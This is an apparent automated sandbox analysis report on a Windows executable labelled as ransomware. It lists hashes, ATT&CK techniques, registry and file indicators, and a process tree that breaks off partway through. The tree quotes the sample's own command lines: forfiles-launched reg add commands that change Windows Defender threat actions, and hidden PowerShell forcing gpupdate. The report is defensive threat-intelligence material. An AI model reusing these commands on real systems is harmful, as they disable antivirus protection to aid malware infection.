57dc9ae71f85b37c7968d4f3fea193ccb3d915d9afee8ec4fd165d3096f04561

Analysis

max time kernel
107s
max time network
112s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
03/10/2024, 12:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
Size

6.7MB
MD5

bc58787697d3dfab922e9bbe376c7055
SHA1

06c8a66f338c809e73d1e7453b39b65be3558aec
SHA256

57dc9ae71f85b37c7968d4f3fea193ccb3d915d9afee8ec4fd165d3096f04561
SHA512

3648e7bf20cb61ec35979c8a9bcd2255ea79f83b9b29a23396dba72fd144e17cee380acf730c3ebcb2648f9d2d50cda766034ab543079e995496cb1cc21616ba
SSDEEP

196608:ebeOQSYdZtHckBGJ0soHJtOd4sGaVKJv2CSJG:EVYvVckBiQj5ak9S

Score

10^/10

defense_evasion discovery evasion execution spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 30 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\YIXdnjwIixpMFthL = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\UQYVlFmkpVlhWwVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\IntOZJXjzgIlwSrYA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\YIXdnjwIixpMFthL = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JXqrxIFSrhCmC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CMKMbRFSZeNU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YjQMAHbWU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dLghTkXXJYUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2664	powershell.exe
1372	powershell.EXE
2428	powershell.EXE
2068	powershell.exe
588	powershell.EXE

Indirect Command Execution 1 TTPs 6 IoCs

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

defense_evasion

Indirect Command Execution

T1202

pid	Process
2756	forfiles.exe
2116	forfiles.exe
2944	forfiles.exe
2320	forfiles.exe
2844	forfiles.exe
2920	forfiles.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fakaldmaepeakkcjljcakjphgknbbbmp\1.1_0\manifest.json	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pookachmhghnpgjhebhilcidgdphdlhi\1.0.0.0\manifest.json	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe

Drops file in System32 directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe

Drops file in Program Files directory 13 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\JXqrxIFSrhCmC\JkkrEXE.dll	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
File created	C:\Program Files (x86)\JXqrxIFSrhCmC\bNBPzON.xml	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
File created	C:\Program Files (x86)\YjQMAHbWU\tahjDA.dll	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{17F63D03-641A-4482-B2EB-067FF4457D6B}.xpi	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
File created	C:\Program Files (x86)\CMKMbRFSZeNU2\ftLashljJDlAu.dll	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
File created	C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR\ghynXMz.dll	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
File created	C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR\fQKBjnt.xml	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{17F63D03-641A-4482-B2EB-067FF4457D6B}.xpi	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
File created	C:\Program Files (x86)\YjQMAHbWU\UvHLSvA.xml	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
File created	C:\Program Files (x86)\CMKMbRFSZeNU2\FswNVpR.xml	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
File created	C:\Program Files (x86)\dLghTkXXJYUn\CdDrsyL.dll	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\GqmqubHZBeiIxpo.job	schtasks.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2220	1424	WerFault.exe	28

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gpupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2204	schtasks.exe
2708	schtasks.exe
2164	schtasks.exe
2684	schtasks.exe
3036	schtasks.exe
1628	schtasks.exe
540	schtasks.exe
2528	schtasks.exe
1736	schtasks.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

pid	Process
2664	powershell.exe
2664	powershell.exe
2664	powershell.exe
1372	powershell.EXE
1372	powershell.EXE
1372	powershell.EXE
2428	powershell.EXE
2428	powershell.EXE
2428	powershell.EXE
2068	powershell.exe
588	powershell.EXE
588	powershell.EXE
588	powershell.EXE
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

description	pid	Process
Token: SeDebugPrivilege	2664	powershell.exe
Token: SeDebugPrivilege	1372	powershell.EXE
Token: SeDebugPrivilege	2428	powershell.EXE
Token: SeDebugPrivilege	2068	powershell.exe
Token: SeIncreaseQuotaPrivilege	1680	WMIC.exe
Token: SeSecurityPrivilege	1680	WMIC.exe
Token: SeTakeOwnershipPrivilege	1680	WMIC.exe
Token: SeLoadDriverPrivilege	1680	WMIC.exe
Token: SeSystemProfilePrivilege	1680	WMIC.exe
Token: SeSystemtimePrivilege	1680	WMIC.exe
Token: SeProfSingleProcessPrivilege	1680	WMIC.exe
Token: SeIncBasePriorityPrivilege	1680	WMIC.exe
Token: SeCreatePagefilePrivilege	1680	WMIC.exe
Token: SeBackupPrivilege	1680	WMIC.exe
Token: SeRestorePrivilege	1680	WMIC.exe
Token: SeShutdownPrivilege	1680	WMIC.exe
Token: SeDebugPrivilege	1680	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1680	WMIC.exe
Token: SeRemoteShutdownPrivilege	1680	WMIC.exe
Token: SeUndockPrivilege	1680	WMIC.exe
Token: SeManageVolumePrivilege	1680	WMIC.exe
Token: 33	1680	WMIC.exe
Token: 34	1680	WMIC.exe
Token: 35	1680	WMIC.exe
Token: SeDebugPrivilege	588	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1424 wrote to memory of 2444	1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe	29
PID 1424 wrote to memory of 2444	1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe	29
PID 1424 wrote to memory of 2444	1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe	29
PID 1424 wrote to memory of 2444	1424	2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe	29
PID 2444 wrote to memory of 2844	2444	cmd.exe	31
PID 2444 wrote to memory of 2844	2444	cmd.exe	31
PID 2444 wrote to memory of 2844	2444	cmd.exe	31
PID 2444 wrote to memory of 2844	2444	cmd.exe	31
PID 2844 wrote to memory of 2848	2844	forfiles.exe	32
PID 2844 wrote to memory of 2848	2844	forfiles.exe	32
PID 2844 wrote to memory of 2848	2844	forfiles.exe	32
PID 2844 wrote to memory of 2848	2844	forfiles.exe	32
PID 2848 wrote to memory of 2928	2848	cmd.exe	33
PID 2848 wrote to memory of 2928	2848	cmd.exe	33
PID 2848 wrote to memory of 2928	2848	cmd.exe	33
PID 2848 wrote to memory of 2928	2848	cmd.exe	33
PID 2444 wrote to memory of 2920	2444	cmd.exe	34
PID 2444 wrote to memory of 2920	2444	cmd.exe	34
PID 2444 wrote to memory of 2920	2444	cmd.exe	34
PID 2444 wrote to memory of 2920	2444	cmd.exe	34
PID 2920 wrote to memory of 2832	2920	forfiles.exe	35
PID 2920 wrote to memory of 2832	2920	forfiles.exe	35
PID 2920 wrote to memory of 2832	2920	forfiles.exe	35
PID 2920 wrote to memory of 2832	2920	forfiles.exe	35
PID 2832 wrote to memory of 2788	2832	cmd.exe	36
PID 2832 wrote to memory of 2788	2832	cmd.exe	36
PID 2832 wrote to memory of 2788	2832	cmd.exe	36
PID 2832 wrote to memory of 2788	2832	cmd.exe	36
PID 2444 wrote to memory of 2756	2444	cmd.exe	37
PID 2444 wrote to memory of 2756	2444	cmd.exe	37
PID 2444 wrote to memory of 2756	2444	cmd.exe	37
PID 2444 wrote to memory of 2756	2444	cmd.exe	37
PID 2756 wrote to memory of 3028	2756	forfiles.exe	38
PID 2756 wrote to memory of 3028	2756	forfiles.exe	38
PID 2756 wrote to memory of 3028	2756	forfiles.exe	38
PID 2756 wrote to memory of 3028	2756	forfiles.exe	38
PID 3028 wrote to memory of 2636	3028	cmd.exe	39
PID 3028 wrote to memory of 2636	3028	cmd.exe	39
PID 3028 wrote to memory of 2636	3028	cmd.exe	39
PID 3028 wrote to memory of 2636	3028	cmd.exe	39
PID 2444 wrote to memory of 2116	2444	cmd.exe	40
PID 2444 wrote to memory of 2116	2444	cmd.exe	40
PID 2444 wrote to memory of 2116	2444	cmd.exe	40
PID 2444 wrote to memory of 2116	2444	cmd.exe	40
PID 2116 wrote to memory of 3024	2116	forfiles.exe	41
PID 2116 wrote to memory of 3024	2116	forfiles.exe	41
PID 2116 wrote to memory of 3024	2116	forfiles.exe	41
PID 2116 wrote to memory of 3024	2116	forfiles.exe	41
PID 3024 wrote to memory of 2792	3024	cmd.exe	42
PID 3024 wrote to memory of 2792	3024	cmd.exe	42
PID 3024 wrote to memory of 2792	3024	cmd.exe	42
PID 3024 wrote to memory of 2792	3024	cmd.exe	42
PID 2444 wrote to memory of 2944	2444	cmd.exe	43
PID 2444 wrote to memory of 2944	2444	cmd.exe	43
PID 2444 wrote to memory of 2944	2444	cmd.exe	43
PID 2444 wrote to memory of 2944	2444	cmd.exe	43
PID 2944 wrote to memory of 2948	2944	forfiles.exe	44
PID 2944 wrote to memory of 2948	2944	forfiles.exe	44
PID 2944 wrote to memory of 2948	2944	forfiles.exe	44
PID 2944 wrote to memory of 2948	2944	forfiles.exe	44
PID 2948 wrote to memory of 2664	2948	cmd.exe	45
PID 2948 wrote to memory of 2664	2948	cmd.exe	45
PID 2948 wrote to memory of 2664	2948	cmd.exe	45
PID 2948 wrote to memory of 2664	2948	cmd.exe	45

C:\Users\Admin\AppData\Local\Temp\2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe"
1⤵
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1424
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2444
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2844
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2848
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:2928
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2920
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2832
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:2788
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2756
  - - C:\Windows\SysWOW64\cmd.exe
